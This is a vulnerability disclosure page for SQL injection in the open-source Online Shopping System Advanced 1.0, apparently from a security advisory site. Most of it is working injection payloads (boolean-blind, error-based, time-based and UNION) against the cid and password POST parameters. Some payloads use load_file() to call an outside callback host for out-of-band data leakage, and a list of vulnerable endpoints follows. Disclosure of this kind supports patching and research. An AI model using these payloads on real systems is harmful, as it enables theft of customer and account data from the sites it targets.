Online Shopping System Advanced 1.0 SQL Injection

2022.10.12
Credit: nu11secur1ty
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

The online-shopping-system-advanced-1.0 suffers from multiple SQLi The attacker can steal all information from the database of this system. Status: CRITICAL [+] Exploit: ```MYSQL Parameter: cid (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' OR NOT 4084=4084 AND 'icSi'='icSi Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' AND (SELECT 3031 FROM(SELECT COUNT(*),CONCAT(0x716a707a71,(SELECT (ELT(3031=3031,1))),0x716a717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gwMy'='gwMy Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' AND (SELECT 4189 FROM (SELECT(SLEEP(17)))bNrO) AND 'UbMN'='UbMN Type: UNION query Title: MySQL UNION query (NULL) - 4 columns Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a707a71,0x7a4e4f74416a58717749646143726a6e68714368626556676e756d7076764867677176516b58684f,0x716a717871),NULL,NULL,NULL# ``` -------------------------------------------------------------------------------------------- ```MYSQL Parameter: password (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: email=wGpFwAQH@tupmangal.net&password=e2H!l7r!I2' AND (SELECT 7287 FROM(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT (ELT(7287=7287,1))),0x7171716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# oUWI&remember-me=on Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: email=wGpFwAQH@tupmangal.net&password=e2H!l7r!I2' AND (SELECT 7259 FROM (SELECT(SLEEP(17)))yXIE)# kWgA&remember-me=on ```` -------------------------------------------------------------------------------------------- ```MYSQL ``` ## And more: ```txt [1.1. http://pwnedhost.com/online-shopping-system-advanced/action.php [cid parameter]] [1.2. http://pwnedhost.com/online-shopping-system-advanced/action.php [cid parameter]] [1.3. http://pwnedhost.com/online-shopping-system-advanced/login.php [password parameter]] [1.4. http://pwnedhost.com/online-shopping-system-advanced/product.php [p parameter]] [1.5. http://pwnedhost.com/online-shopping-system-advanced/product.php [p parameter]] [1.6. http://pwnedhost.com/online-shopping-system-advanced/review.php [email parameter]] [1.7. http://pwnedhost.com/online-shopping-system-advanced/review.php [name parameter]] ``` PoC: https://github.com/PuneethReddyHC/online-shopping-system-advanced/issues/51 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top